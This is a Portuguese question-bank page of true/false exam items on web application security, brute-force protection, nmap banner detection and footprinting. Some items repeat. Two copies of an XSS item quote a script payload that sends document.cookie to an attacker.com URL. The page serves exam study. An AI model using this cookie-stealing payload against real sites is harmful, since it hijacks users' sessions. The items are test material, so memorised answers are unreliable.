Questões de Concurso Para tecnologia da informação
Foram encontradas 2.845 questões
Resolva questões gratuitamente!
Junte-se a mais de 4 milhões de concurseiros!
Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.
><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>
Nesse caso, o risco de segurança da aplicação é a desserialização insegura.
Muitas aplicações web e APIs não protegem de forma
adequada dados sensíveis, como dados financeiros, de saúde
ou de identificação pessoal, por isso, para sua proteção, é
necessário classificar os dados processados, armazenados ou
transmitidos pela aplicação.
Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.
><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>
Nesse caso, o risco de segurança da aplicação é a desserialização insegura.
Limitar o número máximo de tentativas de autenticação
falhadas, ou atrasar progressivamente essa operação, e
registar todas as falhas e alertar os administradores quando
detectados ataques de teste exaustivo ou de força bruta são
formas de prevenir a quebra de autenticação.
Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.
Considere que uma aplicação use a seguinte informação não confiável na construção do HTML, sem validação ou escaping.
Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.
Nesse caso, o risco de segurança da aplicação é a
desserialização insegura.
Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.
Em uma máquina com o Ubuntu 16.04.6 LTS na qual esteja
instalado o servidor nginx 1.10.3 configurado com o valor
off atribuído à variável server_tokens, a execução do
comando nmap -sV localhost -p80 nessa máquina
gerará o resultado a seguir, relacionado à porta analisada.
80/tcp open http nginx 1.10.3 (Ubuntu)
Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.
Fingerprint é a fase do footprint que tem por objetivo a
identificação do endereço IP do host alvo.